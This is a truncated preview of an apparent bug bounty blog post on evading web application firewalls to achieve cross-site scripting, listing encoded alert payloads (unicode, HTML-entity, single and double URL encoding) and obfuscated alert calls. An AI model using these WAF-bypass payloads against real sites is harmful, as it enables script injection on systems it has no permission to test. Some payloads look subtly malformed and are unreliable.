Open in app

Sign in

Write

Sign in

Beyond Simple Alerts: Techniques for Evading WAF and Achieving XSS Success

Lopseg
2 min readDec 22, 2023

TL;DR
If you’re looking for ready-made payloads, go to the end of this blogpost, where I include some interesting ones.

bountycreative/XSS at main · Lopseg/bountycreative

Creative ideas for bounty. Contribute to Lopseg/bountycreative development by creating an account on GitHub.

github.com

Using encoding to Bypass String Checks

To bypass common string checks, you can use Unicode encoding on JSON objects. This can help hide the payload in ways not recognized by WAF.

Example:

JavaScript:\u000aalert(‘Test’)

HTML Encoding in XSS Payloads

Example:

<s&#x61;lert(‘XSS’);</script>

URL Encoding to bypass WAF

Example:

GET /vulnerable?param=%61lert(%22%22)

Double URL Encoding to Confuse WAFs

Example:

%253Cscript%253Ealert(%2527XSS%2527)%253C/script%253E

Stop using just “alert()”

1. Using Constructors and Prototype:

new Function(‘al’ + ‘ert’)(1)

2. Regular Expression and String Match:

/al/.source+/ert/.source/[‘split’](/a/).join(‘’)(1)

3. Creating…

--

--

Lopseg
Lopseg

Written by Lopseg

317 Followers
726 Following

Bachelor of Engineering in Computer Engineering, dedicated to exploring the depths of cybersecurity. Security researcher and avid bug bounty participant.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams